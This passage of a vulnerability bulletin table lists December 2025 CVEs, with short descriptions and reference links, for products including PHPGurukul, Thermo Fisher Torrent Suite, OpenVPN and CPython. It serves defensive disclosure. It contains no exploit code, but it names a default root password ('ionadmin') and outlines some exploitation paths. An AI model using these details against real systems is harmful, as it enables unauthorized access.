| n/a--PHPGurukul Billing System 1.0 | PHPGurukul Billing System 1.0 is vulnerable to SQL Injection in the /admin/password-recovery.php endpoint. Specifically, the username and mobileno parameters accept unvalidated user input, which is then concatenated directly into a backend SQL query. | 2025-12-02 | not yet calculated | CVE-2025-65379 | https://phpgurukul.com/billing-system-using-php-and-mysql/ https://github.com/dewcode91/security-research/blob/main/CVE-2025-65379.md |
| n/a--PHPGurukul Billing System 1.0 | PHPGurukul Billing System 1.0 is vulnerable to SQL Injection in the admin/index.php endpoint. Specifically, the username parameter accepts unvalidated user input, which is then concatenated directly into a backend SQL query. | 2025-12-02 | not yet calculated | CVE-2025-65380 | https://phpgurukul.com/billing-system-using-php-and-mysql https://github.com/dewcode91/security-research/blob/main/CVE-2025-65380.md |
| n/a--Plugin Alliance InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 on macOS | A local privilege escalation vulnerability exists in the Plugin Alliance InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 on macOS. Due to the absence of a hardened runtime and a __RESTRICT segment, a local user may exploit the DYLD_INSERT_LIBRARIES environment variable to inject a dynamic library, potentially resulting in code execution with elevated privileges. | 2025-12-03 | not yet calculated | CVE-2025-62686 | https://almightysec.com/plugin-alliance-installationhelper-dylib-injection/ |
| n/a--PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to SSRF in the chat interface of SimpleAiAdminController. | 2025-12-01 | not yet calculated | CVE-2025-65836 | https://github.com/sanluan/PublicCMS https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/SSRF_1.md https://github.com/sanluan/PublicCMS/issues/99 |
| n/a--PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to path traversal via the doUploadSitefile method. | 2025-12-01 | not yet calculated | CVE-2025-65838 | https://github.com/sanluan/PublicCMS https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/RCE_1.md https://github.com/sanluan/PublicCMS/issues/101 |
| n/a--PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to Cross Site Request Forgery (CSRF) in the CkEditorAdminController. | 2025-12-01 | not yet calculated | CVE-2025-65840 | https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/CSRF_1.md https://github.com/sanluan/PublicCMS/issues/102 |
| n/a--Samsung Mobile Processor Exynos 1280 and 2200 | An issue was discovered in Camera in Samsung Mobile Processor Exynos 1280 and 2200. Unnecessary registration of a hardware IP address in the Camera device driver can lead to a NULL pointer dereference, resulting in a denial of service. | 2025-12-03 | not yet calculated | CVE-2025-54326 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54326/ |
| n/a--Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400 | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. The function used to decode the SOR transparent container lacks bounds checking, which can cause a fatal error. | 2025-12-03 | not yet calculated | CVE-2025-53965 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-53965/ |
| n/a--Seafile Community Edition prior to version 13.0.12 | A stored cross-site scripting (XSS) vulnerability was discovered in Seafile Community Edition prior to version 13.0.12. When Seafile is configured with the Golang file server, an attacker can upload a crafted SVG file containing malicious JavaScript and share it using a public link. Opening the link triggers script execution in the victim's browser. This issue has been fixed in Seafile Community Edition 13.0.12. | 2025-12-04 | not yet calculated | CVE-2025-65516 | https://manual.seafile.com/latest/changelog/server-changelog/ https://gist.github.com/x0root/e5597622fede55b320d29a248dce01e6 |
| n/a--Shirt Pocket SuperDuper! V.3.10 | An issue in Shirt Pocket SuperDuper! V.3.10 and before allows a local attacker to execute arbitrary code via the software update mechanism. | 2025-12-01 | not yet calculated | CVE-2025-61228 | http://shirt.com https://shirt-pocket.com/SuperDuper/SuperDuperDescription.html https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_security_update_v311/ |
| n/a--Shirt Pocket SuperDuper! V.3.10 | An issue in Shirt Pocket's SuperDuper! 3.10 and earlier allows a local attacker to modify the default task template to execute an arbitrary preflight script with root privileges and Full Disk Access, thus bypassing macOS privacy controls. | 2025-12-01 | not yet calculated | CVE-2025-61229 | http://shirt.com https://shirt-pocket.com/SuperDuper/SuperDuperDescription.html https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_security_update_v311/ |
| n/a--Shirt Pocket SuperDuper! v3.10 | Incorrect access control in the SDAgent component of Shirt Pocket SuperDuper! v3.10 allows attackers to escalate privileges to root due to the improper use of a setuid binary. | 2025-12-01 | not yet calculated | CVE-2025-57489 | http://shirt.com https://shirt-pocket.com/SuperDuper/SuperDuperDescription.html https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_security_update_v311/ |
| n/a--SmallBASIC with SDL before v12_28 | A buffer overflow was found in SmallBASIC community SmallBASIC with SDL before v12_28, at commit 298a1d495355959db36451e90a0ac74bcc5593fe, in main.cpp, which can lead to potential information leakage and a crash. | 2025-12-03 | not yet calculated | CVE-2025-50361 | https://github.com/smallbasic/SmallBASIC https://github.com/Ch1keen/CVE-2025-50361 |
| n/a--Snipe-IT before 8.3.4 | Snipe-IT before 8.3.4 allows stored XSS, allowing a low-privileged authenticated user to inject JavaScript that executes in an administrator's session, enabling privilege escalation. | 2025-12-01 | not yet calculated | CVE-2025-65621 | http://snipeitapp.com https://github.com/firef0x00/vulnerability-research/tree/main/CVE-2025-65621 |
| n/a--Snipe-IT before 8.3.4 | Snipe-IT before 8.3.4 allows stored XSS via the Locations "Country" field, enabling a low-privileged authenticated user to inject JavaScript that executes in another user's session. | 2025-12-01 | not yet calculated | CVE-2025-65622 | http://snipeitapp.com https://github.com/firef0x00/vulnerability-research/tree/main/CVE-2025-65622 |
| n/a--SoftSea EPUB File Reader 1.0.0.0 | SoftSea EPUB File Reader 1.0.0.0 is vulnerable to Directory Traversal. The vulnerability resides in the EPUB file processing component, specifically in the functionality responsible for extracting and handling EPUB archive contents. | 2025-12-01 | not yet calculated | CVE-2025-63365 | http://epub.com https://jeroscope.com/advisories/2025/jero-2025-001/ |
| n/a--Sourcecodester Student Grades Management System v1.0 | Sourcecodester Student Grades Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the Add New Subject Description field. | 2025-12-02 | not yet calculated | CVE-2025-64070 | https://www.linkedin.com/in/vabna-lina-24ab17186/ https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-64070 |
| n/a--Sourcecodester Web-based Pharmacy Product Management System v1.0 | Sourcecodester Web-based Pharmacy Product Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /product_expiry/add-supplier.php via the Supplier Name field. | 2025-12-02 | not yet calculated | CVE-2025-65215 | https://www.linkedin.com/in/vabna-lina-24ab17186/ https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-65215 |
| n/a--Sourcecodester Zoo Management System v1.0 | Sourcecodester Zoo Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /classes/Login.php. | 2025-12-02 | not yet calculated | CVE-2025-65881 | https://gist.github.com/MMAKINGDOM/17b85a6e077f08134ee96850f162ed8f https://github.com/MMAKINGDOM/CVE-2025-65881/ |
| n/a--Technitium through v13.2.2 | An issue in Technitium through v13.2.2 enables attackers to conduct a DNS cache poisoning attack and inject fake responses by reviving the birthday attack. | 2025-12-01 | not yet calculated | CVE-2024-56089 | https://technitium.com/dns/ https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md#version-134 |
| n/a--Tempus Ex hello-video-codec v0.1.0 | Improper input validation in the BitstreamWriter::write_bits() function of Tempus Ex hello-video-codec v0.1.0 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-01 | not yet calculated | CVE-2025-63095 | https://gist.github.com/thesmartshadow/b092e2493821491b981a069847a33064 https://github.com/tempus-ex/hello-video-codec https://github.com/tempus-ex/hello-video-codec/tree/3e9551c699311ea12ad7f2fce9562fbc990d524c https://github.com/tempus-ex/hello-video-codec/blob/3e9551c699311ea12ad7f2fce9562fbc990d524c/src/bitstream.rs |
| n/a--Terminalfour 8 through 8.4.1.1 | In Terminalfour 8 through 8.4.1.1, the userLevel parameter in the user management function is not subject to proper server-side authorization checks. A Power User can intercept and modify this parameter to assign the Administrator role to other existing lower-privileged accounts, or invite a new lower-privileged account and escalate its privileges. While manipulating this request, the Power User can also change the target account's password, effectively taking full control of it. | 2025-12-02 | not yet calculated | CVE-2025-58386 | https://terminalfour.com https://docs.terminalfour.com/release-notes/security-notices/cve-2025-58386/ |
| n/a--Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices | An issue was discovered on Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices. They run an SSH server accessible over the default port 22. The root account has a weak default password of ionadmin, and a password change policy for the root account is not enforced. Thus, an attacker with network connectivity can achieve root code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-04 | not yet calculated | CVE-2025-53963 | https://tools.thermofisher.cn/content/sfs/brochures/One_Touch_2_Spec_Sheet.pdf https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0014388_IonOneTouch2Sys_UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices | An issue was discovered on Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices. When they are powered on, an X11 display server is started. The display server listens on all network interfaces and is accessible over port 6000. The X11 access control list, by default, allows connections from 127.0.0.1 and 192.168.2.15. If a device is powered on and later connected to a network with DHCP, the device may not be assigned the 192.168.2.15 IP address, leaving the display server accessible by other devices on the network. The exposed X11 display server can then be used to gain root privileges and the ability to execute code remotely by interacting with matchbox-desktop and spawning a terminal. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-04 | not yet calculated | CVE-2025-54304 | https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0014388_IonOneTouch2Sys_UG.pdf https://www.thermofisher.com/order/catalog/product/4474779 https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1 | The Thermo Fisher Torrent Suite Django application 5.18.1 has weak default credentials, which are stored as fixtures for the Django ORM API. The ionadmin user account can be used to authenticate to default deployments with the password ionadmin. The user guide recommends changing default credentials; however, a password change policy for default administrative accounts is not enforced. Many deployments may retain default credentials, in which case an attacker is likely to be able to successfully authenticate with administrative privileges. | 2025-12-04 | not yet calculated | CVE-2025-54303 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1. | An issue was discovered in the Thermo Fisher Torrent Suite Django application 5.18.1. One of the middlewares included in this application, LocalhostAuthMiddleware, authenticates users as ionadmin if the REMOTE_ADDR property in request.META is set to 127.0.0.1, to 127.0.1.1, or to ::1. Any user with local access to the server may bypass authentication. | 2025-12-04 | not yet calculated | CVE-2025-54305 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1. | An issue was discovered in the Thermo Fisher Torrent Suite Django application 5.18.1. A remote code execution vulnerability exists in the network configuration functionality, stemming from insufficient input validation when processing network configuration parameters through administrative endpoints. The application allows administrators to modify the server's network configuration through the Django application. This configuration is processed by Bash scripts (TSsetnoproxy and TSsetproxy) that write user-controlled data directly to environment variables without proper sanitization. After updating environment variables, the scripts execute a source command on /etc/environment; if an attacker injects malicious data into environment variables, this command can enable arbitrary command execution. The vulnerability begins with the /admin/network endpoint, which passes user-supplied form data as arguments to subprocess.Popen calls. The user-supplied input is then used to update environment variables in TSsetnoproxy and TSsetproxy, and finally source $environment is executed. | 2025-12-04 | not yet calculated | CVE-2025-54306 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1. | An issue was discovered in the Thermo Fisher Torrent Suite Django application 5.18.1. The /configure/plugins/plugin/upload/zip/ and /configure/newupdates/offline/bundle/upload/ endpoints allow low-privilege users to upload ZIP files to the server. The plupload_file_upload function handles these file uploads and constructs the destination file path by using either the name parameter or the uploaded filename, neither of which is properly sanitized. The file extension is extracted by splitting the filename, and a format string is used to construct the final file path, leaving the destination path vulnerable to path traversal. An authenticated attacker with network connectivity can write arbitrary files to the server, enabling remote code execution after overwriting an executable file. An example is the pdflatex executable, which is executed through subprocess.Popen in the write_report_pdf function after requests to a /report/latex/(\d+).pdf endpoint. | 2025-12-04 | not yet calculated | CVE-2025-54307 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Todoist v8896 | Todoist v8896 is vulnerable to Cross Site Scripting (XSS) in /api/v1/uploads. Uploaded SVG files have no sanitization applied, so embedded JavaScript executes when a user opens the attachment from a task/comment. | 2025-12-01 | not yet calculated | CVE-2025-63317 | https://github.com/sefabasnak/Todoistv8896 |
| n/a--Warehouse Management System v1.2 | The warehouse management system version 1.2 contains an arbitrary file read vulnerability. The endpoint `/file/showImageByPath` does not sanitize user-controlled path parameters. An attacker could exploit directory traversal to read arbitrary files on the server's file system. This could lead to the leakage of sensitive system information. | 2025-12-05 | not yet calculated | CVE-2025-65878 | https://github.com/W000i/vuln/issues/2 |
| n/a--Warehouse Management System v1.2 | Warehouse Management System 1.2 contains an authenticated arbitrary file deletion vulnerability. The /goods/deleteGoods endpoint accepts a user-controlled goodsimg parameter, which is directly concatenated with the server's UPLOAD_PATH and passed to File.delete() without validation. A remote authenticated attacker can delete arbitrary files on the server by supplying directory traversal payloads. | 2025-12-05 | not yet calculated | CVE-2025-65879 | https://github.com/W000i/vuln/issues/3 |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to render the Administrator password in plaintext. | 2025-12-04 | not yet calculated | CVE-2025-63361 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-1/ |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 allows attackers to set the Administrator password and username as blank values, allowing attackers to bypass authentication. | 2025-12-04 | not yet calculated | CVE-2025-63362 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-2/ |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | A lack of Management Frame Protection in Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 allows attackers to execute de-authentication attacks, allowing crafted deauthentication and disassociation frames to be broadcast without authentication or encryption. | 2025-12-04 | not yet calculated | CVE-2025-63363 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-3/ |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to transmit Administrator credentials in plaintext. | 2025-12-04 | not yet calculated | CVE-2025-63364 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-4/ |
| n/a--yzcheng90 X-SpringBoot 6.0 | This vulnerability fundamentally arises from yzcheng90 X-SpringBoot 6.0's implementation of role-based access control (RBAC) through dual dependency on frontend menu systems and backend permission tables, without enforcing atomic synchronization between these components. The critical flaw manifests when frontend menu updates (such as privilege revocation) fail to propagate to the backend permission table in real-time, creating a dangerous desynchronization. While users lose access to restricted functions through the web interface (as UI elements properly disappear), the stale permission records still validate unauthorized API requests when accessed directly through tools like Postman. Attackers exploiting this inconsistency can perform privileged operations including but not limited to: creating high-permission user accounts, accessing sensitive data beyond their clearance level, and executing admin-level commands. | 2025-12-04 | not yet calculated | CVE-2025-55948 | https://github.com/yzcheng90/X-SpringBoot https://github.com/liuchengjie01/vuln_db/blob/master/x-springboot3x-vul/x-springboot3x-vul.md |
| n/a--zdh_web thru 5.6.17 | zdh_web is a data collection, processing, monitoring, scheduling, and management platform. In zdh_web through 5.6.17, insufficient validation of file upload paths in the application allows an authenticated user to write arbitrary files to the server file system, potentially overwriting existing files and leading to privilege escalation or remote code execution. | 2025-12-05 | not yet calculated | CVE-2025-65897 | https://github.com/zhaoyachao/zdh_web https://github.com/zhaoyachao/zdh_web/pull/39 https://github.com/zhaoyachao/zdh_web/commit/b2423378a8bf83f159f19ce4e14eac71c939793a https://github.com/zhaoyachao/zdh_web/issues/40 |
| Nagvis--Nagvis version before 1.9.48 | User enumeration in Nagvis' Checkmk MultisiteAuth before version 1.9.48 allows an unauthenticated attacker to enumerate Checkmk usernames. | 2025-12-03 | not yet calculated | CVE-2025-39665 | https://github.com/NagVis/nagvis/pull/411/commits/4acabcf9d5b2d26f390e760f59def8e163908d66 https://www.nagvis.org/downloads/changelog/1.9.48 |
| nopSolutions--nopCommerce | nopCommerce v4.70 and prior, and version 4.80.3, does not invalidate session cookies after logout or session termination, allowing an attacker who has a valid session cookie access to privileged endpoints (such as /admin) even after the legitimate user has logged out, enabling session hijacking. Any version above 4.70 that is not 4.80.3 fixes the vulnerability. | 2025-12-01 | not yet calculated | CVE-2025-11699 | https://seclists.org/fulldisclosure/2025/Aug/14 https://github.com/nopSolutions/nopCommerce/issues/7044 https://www.nopcommerce.com/en/release-notes?srsltid=AfmBOoravPKjN19pm_XZbXZ7GvPhkt8cxlK6794BJRZlY5RxJU_yNoTT |
| Obi08/Enrollment System--Obi08/Enrollment System | Obi08/Enrollment System 1.0 contains a SQL injection vulnerability in the keyword parameter of /get_subject.php that allows unauthenticated attackers to execute arbitrary SQL queries. Attackers can use UNION-based injection to extract sensitive information from the users table including usernames and passwords. | 2025-12-04 | not yet calculated | CVE-2024-58276 | ExploitDB-51845 Official Product Homepage https://www.vulncheck.com/advisories/obi08-enrollment-system-10-loginphp-sql-injection |
| ObjectPlanet--Opinio | Cross-Site Request Forgery (CSRF) in the resource-management feature of ObjectPlanet Opinio 7.26 rev12562 allows an attacker to upload files on behalf of the connected users and then access such files without authentication. | 2025-12-02 | not yet calculated | CVE-2025-13871 | https://www.objectplanet.com/opinio/changelog.html |
| ObjectPlanet--Opinio | Blind Server-Side Request Forgery (SSRF) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on Web-based platforms allows an attacker to force the server to perform HTTP GET requests via crafted import requests to an arbitrary destination. | 2025-12-02 | not yet calculated | CVE-2025-13872 | https://www.objectplanet.com/opinio/changelog.html |
| ObjectPlanet--Opinio | Stored Cross-Site Scripting (XSS) in the survey-import feature of the ObjectPlanet Opinio 7.26 rev12562 web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey. | 2025-12-02 | not yet calculated | CVE-2025-13873 | https://www.objectplanet.com/opinio/changelog.html |
| OpenSolution--QuickCMS | A Blind SQL injection vulnerability has been identified in QuickCMS. Improper neutralization of input provided by a high-privileged user into aFilesDelete allows for Blind SQL Injection attacks. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2025-12-02 | not yet calculated | CVE-2025-12465 | https://cert.pl/posts/2025/12/CVE-2025-12465/ |
| OpenVPN--OpenVPN | Insufficient argument validation in OpenVPN 2.7_alpha1 through 2.7_rc1 allows an attacker to trigger a heap buffer over-read when parsing IP addresses. | 2025-12-01 | not yet calculated | CVE-2025-12106 | https://community.openvpn.net/Security%20Announcements/CVE-2025-12106 https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00152.html |
| OpenVPN--OpenVPN | Improper validation of source IP addresses in OpenVPN version 2.6.0 through 2.7_rc1 allows an attacker to open a session from a different IP address which did not initiate the connection, resulting in a denial of service for the originating client. | 2025-12-03 | not yet calculated | CVE-2025-13086 | https://community.openvpn.net/Security%20Announcements/CVE-2025-13086 https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00152.html https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00151.html |
| OpenVPN--OpenVPN | Interactive service agent in OpenVPN version 2.5.0 through 2.7_rc2 on Windows allows a local authenticated user to connect to the service and trigger an error causing a local denial of service. | 2025-12-03 | not yet calculated | CVE-2025-13751 | https://community.openvpn.net/Security%20Announcements/CVE-2025-13751 https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00154.html https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00153.html |
| Perforce--BlazeMeter | A fix was made in BlazeMeter Jenkins Plugin version 4.27 to allow only users with certain permissions to see the list of available resources such as credential IDs, bzm workspaces and bzm project IDs. Prior to this fix, anyone could see this list as a dropdown on the Jenkins UI. | 2025-12-03 | not yet calculated | CVE-2025-13472 | https://portal.perforce.com/s/cve/a91Qi000002bFgTIAU/missing-authorization-in-blazemeter-jenkins-plugin |
| Ping Identity--One-Time Passcode Integration Kit for PingFederate | The OTP Integration Kit for PingFederate fails to enforce HTTP method validation and state validation properly. The server advances the authentication state without verifying the OTP, thereby bypassing multi-factor authentication. | 2025-12-04 | not yet calculated | CVE-2025-27935 | https://support.pingidentity.com/s/article/SECADV051-PingFederate-OTP-Integration-Kit-authentication-bypass https://www.pingidentity.com/en/resources/downloads/pingfederate.html |
| Portkey-AI--gateway | Portkey.ai Gateway is a blazing fast AI Gateway with integrated guardrails. Prior to 1.14.0, the gateway determined the destination baseURL by prioritizing the value in the x-portkey-custom-host request header. The proxy route then appends the client-specified path to perform an external fetch. This can be maliciously used by users for SSRF attacks. This vulnerability is fixed in 1.14.0. | 2025-12-01 | not yet calculated | CVE-2025-66405 | https://github.com/Portkey-AI/gateway/security/advisories/GHSA-hhh5-2cvx-vmfp https://github.com/Portkey-AI/gateway/pull/1372 https://github.com/Portkey-AI/gateway/commit/b5a7825ba5f4e6918deb32d9969899ce2229a885 |
| Pure Storage--PX Enterprise | A vulnerability exists in PX Enterprise whereby sensitive information may be logged under specific conditions. | 2025-12-04 | not yet calculated | CVE-2025-9127 | https://support.purestorage.com/category/m_pure_storage_product_security |
| Python Software Foundation--CPython | When building nested elements using xml.dom.minidom methods such as appendChild() that have a dependency on _clear_id_cache() the algorithm is quadratic. Availability can be impacted when building excessively nested documents. | 2025-12-03 | not yet calculated | CVE-2025-12084 | https://github.com/python/cpython/pull/142146 https://github.com/python/cpython/issues/142145 https://github.com/python/cpython/commit/08d8e18ad81cd45bc4a27d6da478b51ea49486e4 https://github.com/python/cpython/commit/027f21e417b26eed4505ac2db101a4352b7c51a0 https://github.com/python/cpython/commit/ddcd2acd85d891a53e281c773b3093f9db953964 |
| Python Software Foundation--CPython | When reading an HTTP response from a server, if no read amount is specified, the default behavior will be to use Content-Length. This allows a malicious server to cause the client to read large amounts of data into memory, potentially causing OOM or other DoS. | 2025-12-01 | not yet calculated | CVE-2025-13836 | https://github.com/python/cpython/issues/119451 https://github.com/python/cpython/pull/119454 https://github.com/python/cpython/commit/4ce27904b597c77d74dd93f2c912676021a99155 https://github.com/python/cpython/commit/5a4c4a033a4a54481be6870aa1896fad732555b5 https://mail.python.org/archives/list/security-announce@python.org/thread/OQ6G7MKRQIS3OAREC3HNG3D2DPOU34XO/ https://github.com/python/cpython/commit/289f29b0fe38baf2d7cb5854f4bb573cc34a6a15 |
| Python Software Foundation--CPython | When loading a plist file, the plistlib module reads data in the size specified by the file itself, meaning a malicious file can cause OOM and DoS issues. | 2025-12-01 | not yet calculated | CVE-2025-13837 | https://github.com/python/cpython/pull/119343 https://github.com/python/cpython/issues/119342 https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70 https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/ |
| R Radio Network--Radio Network FM Transmitter | R Radio Network FM Transmitter 1.07 allows unauthenticated attackers to access the admin user's password through the system.cgi endpoint, enabling authentication bypass and FM station setup access. | 2025-12-04 | not yet calculated | CVE-2024-58277 | ExploitDB-51855 Security Advisory for ZSL-2023-5802 https://www.vulncheck.com/advisories/r-radio-network-fm-transmitter-107-system-settings-disclosure |
| Remotecontrolio--Remote Keyboard Desktop | Remote Keyboard Desktop 1.0.1 enables remote attackers to execute system commands via the rundll32.exe exported function export, allowing unauthenticated code execution. | 2025-12-04 | not yet calculated | CVE-2025-66576 | ExploitDB-52299 Vendor Homepage Software Link https://www.vulncheck.com/advisories/remote-keyboard-desktop-101-remote-code-execution-rce |
| ReQuest Serious Play LLC--ReQuest Serious Play Media Player | ReQuest Serious Play Media Player 3.0 contains an unauthenticated file disclosure vulnerability when input passed through the 'file' parameter in and script is not properly verified before being used to read web log files. Attackers can exploit this to disclose contents of files from local resources. | 2025-12-05 | not yet calculated | CVE-2020-36878 | Exploit Database Entry 48949 Zero Science Advisory ZSL-2020-5599 https://www.vulncheck.com/advisories/request-serious-play-f-media-player-directory-traversal-file-disclosure |
| ReQuest Serious Play LLC--ReQuest Serious Play Pro | ReQuest Serious Play F3 Media Server versions 7.0.3.4968 (Pro), 7.0.2.4954, 6.5.2.4954, 6.4.2.4681, 6.3.2.4203, and 2.0.1.823 allow unauthenticated attackers to disclose the webserver's Python debug log file containing system information, credentials, paths, processes and command arguments running on the device. Attackers can access sensitive information by visiting the message_log page. | 2025-12-05 | not yet calculated | CVE-2020-36876 | Exploit Database Entry 48950 Software Link Advisory URL https://www.vulncheck.com/advisories/request-serious-play-f-media-server-debug-log-disclosure |
| ReQuest Serious Play LLC--ReQuest Serious Play Pro | ReQuest Serious Play F3 Media Server 7.0.3 contains an unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary commands as the web server user. Attackers can upload PHP executable files via the Quick File Uploader page, resulting in remote code execution on the server. | 2025-12-05 | not yet calculated | CVE-2020-36877 | Exploit Database Entry 48952 Vendor Security Advisory for ZSL-2020-5602 Official Product Homepage https://www.vulncheck.com/advisories/request-serious-play-f-media-server-unauthenticated-rce |
| Revive--Revive Adserver | HackerOne community member Kassem S. (kassem_s94) has reported that username handling in Revive Adserver was still vulnerable to impersonation attacks after the fix for CVE-2025-52672, via several alternate techniques. Homoglyph-based impersonation has been independently reported by other HackerOne users, such as itz_hari_ and khoof. | 2025-12-02 | not yet calculated | CVE-2025-55129 | https://hackerone.com/reports/3434156 |
